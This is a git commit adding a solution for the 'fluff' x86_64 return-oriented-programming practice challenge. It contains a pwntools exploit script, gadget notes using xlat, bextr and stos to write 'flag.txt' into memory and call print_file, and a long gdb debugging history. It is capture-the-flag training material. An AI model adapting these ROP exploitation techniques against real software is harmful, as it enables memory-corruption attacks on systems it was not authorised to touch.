summaryrefslogtreecommitdiff
path: root/x86_64/fluff
diff options
context:
space:
mode:
Diffstat (limited to 'x86_64/fluff')
-rw-r--r--x86_64/fluff/.gdb_history239
-rw-r--r--x86_64/fluff/corebin0 -> 4292608 bytes
-rwxr-xr-xx86_64/fluff/exploit.py49
-rw-r--r--x86_64/fluff/gadgets44
4 files changed, 332 insertions, 0 deletions
diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history
new file mode 100644
index 0000000..cfa1057
--- /dev/null
+++ b/x86_64/fluff/.gdb_history
@@ -0,0 +1,239 @@
+quit
+quit
+continue
+nexti
+nexti
+info reg rdi
+stepi
+nexti
+info reg rcx
+nexti
+info reg rbx
+stepi
+info reg rdx
+inro reg rbx
+info reg rbx
+quit
+stepi
+continue
+stepi
+x rbx
+info reg rbx
+quit
+conitnue
+continue
+stepi
+info reg rbx
+info reg rcx
+quit
+continue
+stepi
+info reg rbx
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+stepi
+info reg rcx
+stepi
+info reg rbx
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+stepi
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+quit
+continue
+stepi
+info reg rbx
+quit
+stepi
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+stepi
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+quit
+continue
+stepi
+info reg rbx
+quit
+quit
+continue
+stepi
+stepi
+info reg rbp
+stepi
+info reg rax
+stepi
+info reg rax
+stepi
+info reg rdi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+q
+continue
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+quit
+conitnue
+continue
+continue
+stepi
+quit
+x 0x0000000000400000
+x/c 0x0000000000400000
+x/c 0x00000000004003c4
+x/c 0x0000000000400000
+quit
+continue
+stepi
+x/s 0x601be0
+x/c 0x0000000000400251
+stepi
+stepi
+x/s flag.txt
+x/s 0x601be0
+quit
+watch *0x601be0 + 7
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+x/s 0x601be1
+x/s 0x601be0
+x/s 0x601be7
+continue
+x/s 0x601be7
+x/s 0x601be0
+continue
+quit
+watch *0x601be4
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s $rdi
+x/s 0x601be0
+quit
+continue
+x/s 0x601be0
+quit
+break *0x00000000004006a3
+continue
+context
+stepi
+x/s $rdi
+stepi
+quit
+break *0x00000000004006a3
+continue
+context
+c/s 0x7ffdf0faba10 - 8
+x/s 0x7ffdf0faba10 - 8
+x/s 0x7ffdf0faba10 - 4
+x/s 0x7ffdf0faba10 - 16
+x/x 0x7ffdf0faba10 - 8
+x/x 0x7ffdf0faba10
+x/x 0x7ffdf0faba10 = 4
+x/x 0x7ffdf0faba10 - 4
+x/x 0x7ffdf0faba10 + 4
+context
+info reg rdi
+info reg rip
+search
+search 0x601be0
+search --qword 0x601be0
+search --qword 0x601be0 --writable
+search --qword 0x0000000000400510 --writable
+context
+continue
+stepi
+continue
+stepi
+quit
+break *0x00000000004006a3
+continue
+stepi
+continue
+x/i 0x400639
+x/10i 0x400639
+quit
+break *0x400639
+conitnue
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+quit
+break *0x400639
+continue
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+x/x 0x601be0 + 8
+x/x 0x601be0 + 9
+x/x 0x601be0 + 10
+quit
diff --git a/x86_64/fluff/core b/x86_64/fluff/core
new file mode 100644
index 0000000..ae36a67
--- /dev/null
+++ b/x86_64/fluff/core
Binary files differ
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
diff --git a/x86_64/fluff/gadgets b/x86_64/fluff/gadgets
new file mode 100644
index 0000000..6c2f329
--- /dev/null
+++ b/x86_64/fluff/gadgets
@@ -0,0 +1,44 @@
+Memory bytes information
+=======================================================
+0x00000000004003c4 : 'f'
+0x0000000000400239 : 'l'
+0x00000000004003d6 : 'a'
+0x00000000004003cf : 'g'
+0x0000000000400000 : '.'
+0x0000000000400192 : 't'
+0x0000000000400246 : 'x'
+0x0000000000400192 : 't'
+
+0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
+
+400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx
+***
+40062a: 5a pop rdx
+40062b: 59 pop rcx
+40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2
+400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx
+
+#rdx is controller.
+rdx bits 0-7: starting bit
+rdx bits 8-15: length
+***
+400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi
+ # requires rdi (check), al
+
+
+
+0000000000400510 : print_file@plt
+
+
+0x00000000004006a3 : pop rdi ; ret
+
+
+exploit:
+
+write to memory using al as letter
+ set al to zero
+ set rbx to memory location
+ rcx: (location - 0x3ef2) before bextr
+ rdx: 0x00 0x20 (from position zero, using 32 bits)
+
+